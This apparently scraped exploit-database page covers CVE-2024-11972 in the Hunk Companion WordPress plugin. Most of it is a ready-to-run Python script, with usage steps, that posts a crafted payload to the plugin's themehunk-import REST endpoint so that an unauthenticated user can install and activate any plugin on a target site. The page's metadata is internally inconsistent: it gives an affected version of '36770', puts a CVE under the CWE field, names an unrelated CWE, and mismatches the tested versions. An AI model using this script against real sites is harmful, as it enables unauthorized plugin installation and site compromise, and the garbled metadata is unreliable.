Hunk Companion Plugin 1.9.0 - Unauthenticated Plugin Installation

vendor:

Hunk Companion Plugin

by:

Jun Takemura

6.1

CVSS

HIGH

Unauthenticated Plugin Installation

119

CWE

Product Name: Hunk Companion Plugin

Affected Version From: 1.9

Affected Version To: 36770

Patch Exists: NO

Related CWE: CVE-2024-11972

CPE: a:themehunk:hunk_companion:1.9.0

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu

2024

Hunk Companion Plugin 1.9.0 – Unauthenticated Plugin Installation

The Hunk Companion plugin version 1.9.0 is vulnerable to unauthenticated plugin installation due to a flaw in the permission_callback for the /wp-json/hc/v1/themehunk-import endpoint. This vulnerability allows unauthorized attackers to install and activate any plugin from the WordPress.org repository.

Mitigation:

Update to the latest version of the Hunk Companion plugin to prevent exploitation of this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: Hunk Companion Plugin 1.9.0 - Unauthenticated Plugin Installation
# Date: 16 December, 2024
# Exploit Author: Jun Takemura
# Author's GitHub: https://github.com/JunTakemura
# Author's Blog: juntakemura.dev
# Vendor Homepage: https://themehunk.com
# Software Link: https://wordpress.org/plugins/hunk-companion/
# Version: Tested on Hunk Companion 1.8.8
# CVE: CVE-2024-11972
# Vulnerability Description:
#     Exploits a flaw in the Hunk Companion plugin's permission_callback for the
#     /wp-json/hc/v1/themehunk-import endpoint, allowing unauthenticated attackers
#     to install and activate arbitrary plugins from the WordPress.org repository.
# Tested on: Ubuntu
# Original vulnerability discovered by: Daniel Rodriguez
#
# Usage:
#     1. Update `target_url` below with the target WordPress site's URL.
#     2. Update `plugin_name` with the slug of the plugin you want to install.
#     3. Run: python3 exploit.py
#
import requests
from urllib.parse import urljoin

# Update 'URL' with your target WordPress site URL, for example "http://localhost/wordpress"
target_url = "URL"

# Update 'NAME' with desired plugin's name (slug), for example "wp-query-console"
plugin_name = "NAME"

endpoint = "/wp-json/hc/v1/themehunk-import"
url = urljoin(target_url, endpoint)

payload = {
    "params": {
        "plugin": {
            plugin_name: "Plugin Label"
        },
        "allPlugins": [
            {
                plugin_name: f"{plugin_name}/{plugin_name}.php"
            }
        ],
        "themeSlug": "theme",
        "proThemePlugin": "plugin",
        "templateType": "free",
        "tmplFreePro": "theme",
        "wpUrl": target_url
    }
}

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64)",
    "Content-Type": "application/json"
}

try:
    response = requests.post(url, json=payload, headers=headers, timeout=10)
    response.raise_for_status()  # Raises an HTTPError if the response is not 2xx

    print(f"[+] Exploit sent successfully.")
    print(f"Response Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")